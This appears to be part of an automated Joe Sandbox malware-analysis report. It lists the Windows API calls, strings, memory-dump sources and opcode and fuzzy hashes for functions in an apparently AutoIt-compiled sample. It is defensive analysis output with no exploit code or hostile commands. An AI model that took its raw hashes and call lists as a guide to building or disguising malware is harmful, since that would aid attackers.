                        • GetPixel.GDI32(00000000,?,?), ref: 009D7484
                        • ReleaseDC.USER32(?,00000000), ref: 009D7496
                        • GetSysColor.USER32(00000005), ref: 009D74B0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ClientColorMessagePixelRectReleaseSendWindow
                        • String ID:
                        • API String ID: 272304278-0
                        • Opcode ID: 888de3397135960ee93373be4eaa17c6728c3a5c4f685f20a9924b1823b0b74d
                        • Instruction ID: c1f60584c6e95b32ce7ce245c6dfee37cc4eaf61d3a49327cb0ce7440273048f
                        • Opcode Fuzzy Hash: 888de3397135960ee93373be4eaa17c6728c3a5c4f685f20a9924b1823b0b74d
                        • Instruction Fuzzy Hash: E2018631480215EFEB519FE4DC08BEABBB6FB04321F608164F926A21B0DB311E42EB10
                        APIs
                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009E187F
                        • UnloadUserProfile.USERENV(?,?), ref: 009E188B
                        • CloseHandle.KERNEL32(?), ref: 009E1894
                        • CloseHandle.KERNEL32(?), ref: 009E189C
                        • GetProcessHeap.KERNEL32(00000000,?), ref: 009E18A5
                        • HeapFree.KERNEL32(00000000), ref: 009E18AC
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                        • String ID:
                        • API String ID: 146765662-0
                        • Opcode ID: 1010cd47f26430decf6f349a55c75e4fd6822acca11fc3872f9c0849eae6a532
                        • Instruction ID: 7d4ec8b9a63bff75ecf371b985e42ab7378006f728694f66834d1ba8b3ec4b28
                        • Opcode Fuzzy Hash: 1010cd47f26430decf6f349a55c75e4fd6822acca11fc3872f9c0849eae6a532
                        • Instruction Fuzzy Hash: A7E0C236484211BBDA019BE1ED0C98ABB2AFB49B32B10C220F225850B0CB729422DB50
                        APIs
                          • Part of subcall function 00987620: _wcslen.LIBCMT ref: 00987625
                        • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009EC6EE
                        • _wcslen.LIBCMT ref: 009EC735
                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 009EC79C
                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 009EC7CA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ItemMenu$Info_wcslen$Default
                        • String ID: 0
                        • API String ID: 1227352736-4108050209
                        • Opcode ID: d9bc8c01051be17ead18aec101607e439726a381b43a16bfdf0eb0681f650520
                        • Instruction ID: 50962fb087d67a4925969b633f5a19eda0cf4d512f61b05388bd9c740e829a7e
                        • Opcode Fuzzy Hash: d9bc8c01051be17ead18aec101607e439726a381b43a16bfdf0eb0681f650520
                        • Instruction Fuzzy Hash: A151D1B16043819BD712DF2AC885B6BB7E8AF8A710F040A2DF9D5D3290DB75DC46CB52
                        APIs
                        • ShellExecuteExW.SHELL32(0000003C), ref: 00A0AEA3
                          • Part of subcall function 00987620: _wcslen.LIBCMT ref: 00987625
                        • GetProcessId.KERNEL32(00000000), ref: 00A0AF38
                        • CloseHandle.KERNEL32(00000000), ref: 00A0AF67
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: CloseExecuteHandleProcessShell_wcslen
                        • String ID: <$@
                        • API String ID: 146682121-1426351568
                        • Opcode ID: 05163564d136dbf3d921c964affc3a9567c696c01304d0159c17d56d66df50d2
                        • Instruction ID: e3c1a4245c796216ffdbe8175ce3918ec1761c546dc7c6dd3fabad1c9da7e8f4
                        • Opcode Fuzzy Hash: 05163564d136dbf3d921c964affc3a9567c696c01304d0159c17d56d66df50d2
                        • Instruction Fuzzy Hash: 8E717A71A00619DFCB14EF94D484A9EBBF0FF48314F148499E856AB792CB74ED41CBA1
                        APIs
                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 009E7206
                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009E723C
                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009E724D
                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 009E72CF
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: ErrorMode$AddressCreateInstanceProc
                        • String ID: DllGetClassObject
                        • API String ID: 753597075-1075368562
                        • Opcode ID: 431bae32f41b19910e114e504401bdc6d3e1f8bc98130d614c9a6993f5d3af6a
                        • Instruction ID: ffe6bb2dceeb4f85c9367f64d46af19dd960f7850a4efd5e2018eff283ead365
                        • Opcode Fuzzy Hash: 431bae32f41b19910e114e504401bdc6d3e1f8bc98130d614c9a6993f5d3af6a
                        • Instruction Fuzzy Hash: A4419F71A04245EFDB16CF95C884B9ABBA9EF84310F1484A9BE059F30AD7B0DD41CBA1
                        APIs
                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A13E35
                        • IsMenu.USER32(?), ref: 00A13E4A
                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A13E92
                        • DrawMenuBar.USER32 ref: 00A13EA5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: Menu$Item$DrawInfoInsert
                        • String ID: 0
                        • API String ID: 3076010158-4108050209
                        • Opcode ID: 6ffd1b1a5a7399df1c548e77d4f4d796e38ab529fec2405dbb235a2d6292ca7c
                        • Instruction ID: 255c8f923a0bcb07e14885aacaab8611df78da46c6428823e964c89856f92669
                        • Opcode Fuzzy Hash: 6ffd1b1a5a7399df1c548e77d4f4d796e38ab529fec2405dbb235a2d6292ca7c
                        • Instruction Fuzzy Hash: 77410876A01309EFDF10DF94D884AEABBF9FF49364F044129E915A7290D730AE95CB50
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                          • Part of subcall function 009E3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 009E3CCA
                        • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 009E1E66
                        • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 009E1E79
                        • SendMessageW.USER32(?,00000189,?,00000000), ref: 009E1EA9
                          • Part of subcall function 00986B57: _wcslen.LIBCMT ref: 00986B6A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: MessageSend$_wcslen$ClassName
                        • String ID: ComboBox$ListBox
                        • API String ID: 2081771294-1403004172
                        • Opcode ID: 70e5497e3fe7b9e428b7872c2e9b89f33152af848c37606a4fc79494cca3309f
                        • Instruction ID: 9c35b9785022131bdc066f452b709da80fc24ec81b2267871b08de4a0eeea1dd
                        • Opcode Fuzzy Hash: 70e5497e3fe7b9e428b7872c2e9b89f33152af848c37606a4fc79494cca3309f
                        • Instruction Fuzzy Hash: E5212371A00144BFDB15ABB5CC49EFFB7B9EF85360B148519F826A72E1DB384D0A8720
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        • Associated: 00000000.00000002.1702128325.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A1C000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702182077.0000000000A42000.00000002.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702213651.0000000000A4C000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.1702225810.0000000000A54000.00000002.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_980000_p4LNUqyKZM.jbxd
                        Similarity
                        • API ID: _wcslen
                        • String ID: HKEY_LOCAL_MACHINE$HKLM
                        • API String ID: 176396367-4004644295
                        • Opcode ID: 98a0ac7beb2a557fb4abea95323d250cd99704d37c6e0a1c68cfaf2bcfa56c0b
                        • Instruction ID: 692e88e940c3623fd5ff57466fc6d4ac870b98bb2c6c1e92e0ce601086f2033d
                        • Opcode Fuzzy Hash: 98a0ac7beb2a557fb4abea95323d250cd99704d37c6e0a1c68cfaf2bcfa56c0b
                        • Instruction Fuzzy Hash: 7031D572B0016E4BCB20EF6CA8505BF73939BE17E0B154229E855AB3C5E671CE4593A0
                        APIs
                        • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00A12F8D
                        • LoadLibraryW.KERNEL32(?), ref: 00A12F94
                        • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00A12FA9
                        • DestroyWindow.USER32(?), ref: 00A12FB1
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        Similarity
                        • API ID: MessageSend$DestroyLibraryLoadWindow
                        • String ID: SysAnimate32
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,009A4D1E,009B28E9,?,009A4CBE,009B28E9,00A488B8,0000000C,009A4E15,009B28E9,00000002), ref: 009A4D8D
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 009A4DA0
                        • FreeLibrary.KERNEL32(00000000,?,?,?,009A4D1E,009B28E9,?,009A4CBE,009B28E9,00A488B8,0000000C,009A4E15,009B28E9,00000002,00000000), ref: 009A4DC3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00984EDD,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984E9C
                        • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00984EAE
                        • FreeLibrary.KERNEL32(00000000,?,?,00984EDD,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984EC0
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        Similarity
                        • API ID: Library$AddressFreeLoadProc
                        • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                        APIs
                        • LoadLibraryA.KERNEL32(kernel32.dll,?,?,009C3CDE,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984E62
                        • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00984E74
                        • FreeLibrary.KERNEL32(00000000,?,?,009C3CDE,?,00A51418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00984E87
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        Similarity
                        • API ID: Library$AddressFreeLoadProc
                        • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                        APIs
                        • GetCurrentProcessId.KERNEL32 ref: 00A0A427
                        • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00A0A435
                        • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00A0A468
                        • CloseHandle.KERNEL32(?), ref: 00A0A63D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        Similarity
                        • API ID: Process$CloseCountersCurrentHandleOpen
                        APIs
                          • Part of subcall function 009EDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,009ECF22,?), ref: 009EDDFD
                          • Part of subcall function 009EDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,009ECF22,?), ref: 009EDE16
                          • Part of subcall function 009EE199: GetFileAttributesW.KERNEL32(?,009ECF95), ref: 009EE19A
                        • lstrcmpiW.KERNEL32(?,?), ref: 009EE473
                        • MoveFileW.KERNEL32(?,?), ref: 009EE4AC
                        • _wcslen.LIBCMT ref: 009EE5EB
                        • _wcslen.LIBCMT ref: 009EE603
                        • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 009EE650
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        Similarity
                        • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                        APIs
                          • Part of subcall function 00989CB3: _wcslen.LIBCMT ref: 00989CBD
                          • Part of subcall function 00A0C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00A0B6AE,?,?), ref: 00A0C9B5
                          • Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0C9F1
                          • Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0CA68
                          • Part of subcall function 00A0C998: _wcslen.LIBCMT ref: 00A0CA9E
                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00A0BAA5
                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00A0BB00
                        • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00A0BB63
                        • RegCloseKey.ADVAPI32(?,?), ref: 00A0BBA6
                        • RegCloseKey.ADVAPI32(00000000), ref: 00A0BBB3
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        Similarity
                        • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                        APIs
                        • VariantInit.OLEAUT32(?), ref: 009E8BCD
                        • VariantClear.OLEAUT32 ref: 009E8C3E
                        • VariantClear.OLEAUT32 ref: 009E8C9D
                        • VariantClear.OLEAUT32(?), ref: 009E8D10
                        • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 009E8D3B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        Similarity
                        • API ID: Variant$Clear$ChangeInitType
                        APIs
                        • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009F8BAE
                        • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 009F8BDA
                        • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 009F8C32
                        • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 009F8C57
                        • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 009F8C5F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        Similarity
                        • API ID: PrivateProfile$SectionWrite$String
                        APIs
                        • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00A08F40
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00A08FD0
                        • GetProcAddress.KERNEL32(00000000,00000000), ref: 00A08FEC
                        • GetProcAddress.KERNEL32(00000000,?), ref: 00A09032
                        • FreeLibrary.KERNEL32(00000000), ref: 00A09052
                          • Part of subcall function 0099F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,009F1043,?,753CE610), ref: 0099F6E6
                          • Part of subcall function 0099F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,009DFA64,00000000,00000000,?,?,009F1043,?,753CE610,?,009DFA64), ref: 0099F70D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        Similarity
                        • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                        APIs
                        • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00A16C33
                        • SetWindowLongW.USER32(?,000000EC,?), ref: 00A16C4A
                        • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00A16C73
                        • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,009FAB79,00000000,00000000), ref: 00A16C98
                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00A16CC7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        Similarity
                        • API ID: Window$Long$MessageSendShow
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        Similarity
                        • API ID: _free
                        APIs
                        • GetCursorPos.USER32(?), ref: 00999141
                        • ScreenToClient.USER32(00000000,?), ref: 0099915E
                        • GetAsyncKeyState.USER32(00000001), ref: 00999183
                        • GetAsyncKeyState.USER32(00000002), ref: 0099919D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        Similarity
                        • API ID: AsyncState$ClientCursorScreen
                        APIs
                        • GetInputState.USER32 ref: 009F38CB
                        • TranslateAcceleratorW.USER32(?,00000000,?), ref: 009F3922
                        • TranslateMessage.USER32(?), ref: 009F394B
                        • DispatchMessageW.USER32(?), ref: 009F3955
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009F3966
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        Similarity
                        • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                        APIs
                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 009FCF38
                        • InternetReadFile.WININET(?,00000000,?,?), ref: 009FCF6F
                        • GetLastError.KERNEL32(?,00000000,?,?,?,009FC21E,00000000), ref: 009FCFB4
                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,009FC21E,00000000), ref: 009FCFC8
                        • SetEvent.KERNEL32(?,?,00000000,?,?,?,009FC21E,00000000), ref: 009FCFF2
                        Memory Dump Source
                        • Source File: 00000000.00000002.1702139657.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                        Similarity
                        • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 009E1915
                        • PostMessageW.USER32(00000001,00000201,00000001), ref: 009E19C1
                        • Sleep.KERNEL32(00000000,?,?,?), ref: 009E19C9
                        • PostMessageW.USER32(00000001,00000202,00000000), ref: 009E19DA
                        • Sleep.KERNEL32(00000000,?,?,?,?), ref: 009E19E2
                        Similarity
                        • API ID: MessagePostSleep$RectWindow
                        • String ID:
                        • API String ID: 3382505437-0
                        APIs
                        • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00A15745
                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 00A1579D
                        • _wcslen.LIBCMT ref: 00A157AF
                        • _wcslen.LIBCMT ref: 00A157BA
                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00A15816
                        Similarity
                        • API ID: MessageSend$_wcslen
                        • String ID:
                        • API String ID: 763830540-0
                        APIs
                        • IsWindow.USER32(00000000), ref: 00A00951
                        • GetForegroundWindow.USER32 ref: 00A00968
                        • GetDC.USER32(00000000), ref: 00A009A4
                        • GetPixel.GDI32(00000000,?,00000003), ref: 00A009B0
                        • ReleaseDC.USER32(00000000,00000003), ref: 00A009E8
                        Similarity
                        • API ID: Window$ForegroundPixelRelease
                        • String ID:
                        • API String ID: 4156661090-0
                        APIs
                        • GetEnvironmentStringsW.KERNEL32 ref: 009BCDC6
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 009BCDE9
                          • Part of subcall function 009B3820: RtlAllocateHeap.NTDLL(00000000,?,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6,?,00981129), ref: 009B3852
                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 009BCE0F
                        • _free.LIBCMT ref: 009BCE22
                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 009BCE31
                        Similarity
                        • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                        • String ID:
                        • API String ID: 336800556-0
                        APIs
                        • GetSysColor.USER32(00000008), ref: 009998CC
                        • SetTextColor.GDI32(?,?), ref: 009998D6
                        • SetBkMode.GDI32(?,00000001), ref: 009998E9
                        • GetStockObject.GDI32(00000005), ref: 009998F1
                        • GetWindowLongW.USER32(?,000000EB), ref: 00999952
                        Similarity
                        • API ID: Color$LongModeObjectStockTextWindow
                        • String ID:
                        • API String ID: 1860813098-0
                        APIs
                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00999693
                        • SelectObject.GDI32(?,00000000), ref: 009996A2
                        • BeginPath.GDI32(?), ref: 009996B9
                        • SelectObject.GDI32(?,00000000), ref: 009996E2
                        Similarity
                        • API ID: ObjectSelect$BeginCreatePath
                        • String ID:
                        • API String ID: 3225163088-0
                        APIs
                        Similarity
                        • API ID: _memcmp
                        • String ID:
                        • API String ID: 2931989736-0
                        APIs
                        • GetLastError.KERNEL32(?,?,?,009AF2DE,009B3863,00A51444,?,0099FDF5,?,?,0098A976,00000010,00A51440,009813FC,?,009813C6), ref: 009B2DFD
                        • _free.LIBCMT ref: 009B2E32
                        • _free.LIBCMT ref: 009B2E59
                        • SetLastError.KERNEL32(00000000,00981129), ref: 009B2E66
                        • SetLastError.KERNEL32(00000000,00981129), ref: 009B2E6F
                        Similarity
                        • API ID: ErrorLast$_free
                        • String ID:
                        • API String ID: 3170660625-0
                        APIs
                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?,?,009E035E), ref: 009E002B
                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?), ref: 009E0046
                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?), ref: 009E0054
                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?), ref: 009E0064
                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,009DFF41,80070057,?,?), ref: 009E0070
                        Similarity
                        • API ID: From$Prog$FreeStringTasklstrcmpi
                        • String ID:
                        • API String ID: 3897988419-0
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?), ref: 009EE997
                        • QueryPerformanceFrequency.KERNEL32(?), ref: 009EE9A5
                        • Sleep.KERNEL32(00000000), ref: 009EE9AD
                        • QueryPerformanceCounter.KERNEL32(?), ref: 009EE9B7
                        • Sleep.KERNEL32 ref: 009EE9F3
                        Similarity
                        • API ID: PerformanceQuery$CounterSleep$Frequency
                        • String ID:
                        • API String ID: 2833360925-0
                        APIs
                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 009E1114
                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E1120
                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E112F
                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009E0B9B,?,?,?), ref: 009E1136
                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 009E114D
                        Similarity
                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 842720411-0
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 009E0FCA
                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 009E0FD6
                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 009E0FE5
                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 009E0FEC
                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 009E1002
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 009E102A
                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 009E1036
